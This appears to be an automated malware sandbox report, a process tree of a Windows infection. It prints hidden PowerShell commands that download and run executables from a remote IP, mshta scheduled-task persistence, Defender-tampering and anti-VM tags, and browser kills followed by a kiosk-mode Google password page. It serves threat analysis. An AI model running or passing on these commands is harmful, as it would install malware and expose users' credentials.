        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3696
      - C:\Users\Admin\AppData\Local\TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE
        
        "C:\Users\Admin\AppData\Local\TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" "
    3⤵
    PID:4148
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" any_word
      4⤵
      PID:4996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3264
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        
        PID:4940
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4512
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5356
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4812
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5368
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:72
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "RDro5malfmZ" /tr "mshta \"C:\Temp\DZx0zsVul.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5636
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\DZx0zsVul.hta"
        5⤵
        
        PID:5540
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5804
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3244
- - C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:4432
- - C:\Users\Admin\AppData\Local\Temp\1090372001\a8a5b07bf4.exe
    "C:\Users\Admin\AppData\Local\Temp\1090372001\a8a5b07bf4.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5208
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:412
- - C:\Users\Admin\AppData\Local\Temp\1090373001\d74640f13d.exe
    "C:\Users\Admin\AppData\Local\Temp\1090373001\d74640f13d.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1692
- - C:\Users\Admin\AppData\Local\Temp\1090374001\afaefd507f.exe
    "C:\Users\Admin\AppData\Local\Temp\1090374001\afaefd507f.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3792
- - C:\Users\Admin\AppData\Local\Temp\1090375001\67152b305c.exe
    "C:\Users\Admin\AppData\Local\Temp\1090375001\67152b305c.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:5944
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:5580
- - C:\Users\Admin\AppData\Local\Temp\1090376001\d35ce9d381.exe
    "C:\Users\Admin\AppData\Local\Temp\1090376001\d35ce9d381.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\1090377001\33f82ae2b0.exe
    "C:\Users\Admin\AppData\Local\Temp\1090377001\33f82ae2b0.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2680
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      PID:3960
- - C:\Users\Admin\AppData\Local\Temp\1090378001\1cc9b19df2.exe
    "C:\Users\Admin\AppData\Local\Temp\1090378001\1cc9b19df2.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    PID:3116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3116 -s 1596
      4⤵
      Program crash
      PID:1092
- - C:\Users\Admin\AppData\Local\Temp\1090379001\5a903ed074.exe
    "C:\Users\Admin\AppData\Local\Temp\1090379001\5a903ed074.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3244
- - C:\Users\Admin\AppData\Local\Temp\1090380001\b91b4b1726.exe
    "C:\Users\Admin\AppData\Local\Temp\1090380001\b91b4b1726.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:2436
- - C:\Users\Admin\AppData\Local\Temp\1090381001\54352f7f9d.exe
    "C:\Users\Admin\AppData\Local\Temp\1090381001\54352f7f9d.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:1752
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1884
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5660
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:6004
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        
        PID:912
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1900 -parentBuildID 20240401114208 -prefsHandle 1812 -prefMapHandle 1804 -prefsLen 27211 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {68e021b4-e545-4ac6-bad1-9c64d02848f2} 912 "\\.\pipe\gecko-crash-server-pipe.912" gpu
        6⤵
        
        PID:2984
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2360 -parentBuildID 20240401114208 -prefsHandle 2336 -prefMapHandle 2324 -prefsLen 28131 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c3bcc-ff30-4343-bc9d-30f975e6b7f0} 912 "\\.\pipe\gecko-crash-server-pipe.912" socket
        6⤵
        
        PID:1004
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3412 -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0af34d6-4aba-4293-a34c-9238702c3b62} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:2292
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3788 -prefMapHandle 1080 -prefsLen 32621 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20ca008b-beae-4e97-90c8-82241f0da7f0} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:4260
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4540 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4800 -prefMapHandle 4648 -prefsLen 32621 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78f23c1f-147b-4129-9ed5-8c6a46f70d78} 912 "\\.\pipe\gecko-crash-server-pipe.912" utility
        6⤵
        Checks processor information in registry
        
        PID:2368
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83f1e9fa-1c17-4277-a318-aae0683aa254} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:6372
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eb44f95-1ae3-4059-872d-9e9b9869bc19} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:6384
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5820 -childID 5 -isForBrowser -prefsHandle 5832 -prefMapHandle 5836 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55543cf6-977b-47c3-b761-355e527b5bcc} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:6396
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -childID 6 -isForBrowser -prefsHandle 3504 -prefMapHandle 3520 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2faa602b-41a3-4a60-99e0-7660aa23dbb6} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:5244
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6164 -childID 7 -isForBrowser -prefsHandle 6156 -prefMapHandle 6152 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb96bed0-141a-4179-9d3f-050adbba8374} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
        6⤵
        
        PID:6360
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6080 -parentBuildID 20240401114208 -prefsHandle 6088 -prefMapHandle 5708 -prefsLen 33150 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {034a014a-7c2c-4239-be15-54b39419bd87} 912 "\\.\pipe\gecko-crash-server-pipe.912" rdd
        6⤵
        
        PID:6688
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6072 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5788 -prefMapHandle 5784 -prefsLen 33150 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bba17b7f-303a-4154-9c87-871dbbb9b69b} 912 "\\.\pipe\gecko-crash-server-pipe.912" utility
        6⤵
        Checks processor information in registry
        
        PID:6976
- - C:\Users\Admin\AppData\Local\Temp\1090382001\85e559204e.exe
    "C:\Users\Admin\AppData\Local\Temp\1090382001\85e559204e.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:1404
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn mcNxtmaBsXa /tr "mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2132
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn mcNxtmaBsXa /tr "mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1908
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta
      4⤵
      System Location Discovery: System Language Discovery
      PID:4008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious use of AdjustPrivilegeToken
        
        PID:1996
      - C:\Users\Admin\AppData\Local\TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
        
        "C:\Users\Admin\AppData\Local\TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6200
- - C:\Users\Admin\AppData\Local\Temp\1090383001\1e56a29b0d.exe
    "C:\Users\Admin\AppData\Local\Temp\1090383001\1e56a29b0d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:6676
- - C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe
    "C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:4696
- - C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6984
- - C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe
    "C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4956
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:5096
- - C:\Users\Admin\AppData\Local\Temp\1090387001\fa829ac30d.exe
    "C:\Users\Admin\AppData\Local\Temp\1090387001\fa829ac30d.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:6680
- - C:\Users\Admin\AppData\Local\Temp\1090388001\26da168d66.exe
    "C:\Users\Admin\AppData\Local\Temp\1090388001\26da168d66.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2832 -ip 2832
1⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91609cc40,0x7ff91609cc4c,0x7ff91609cc58
  2⤵
  PID:3628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:2
  2⤵
  PID:5524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3
  2⤵
  PID:5308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2116 /prefetch:8
  2⤵
  PID:4860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:5512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4276 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3168,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:8
  2⤵
  PID:5996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4564 /prefetch:8
  2⤵
  PID:5980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4592,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:8
  2⤵
  PID:3040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8
  2⤵
  PID:5468

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4264

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:5652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 852 -ip 852
1⤵
PID:4272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1408 -ip 1408
1⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3992

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1572

C:\Windows\system32\AUDIODG.EXE
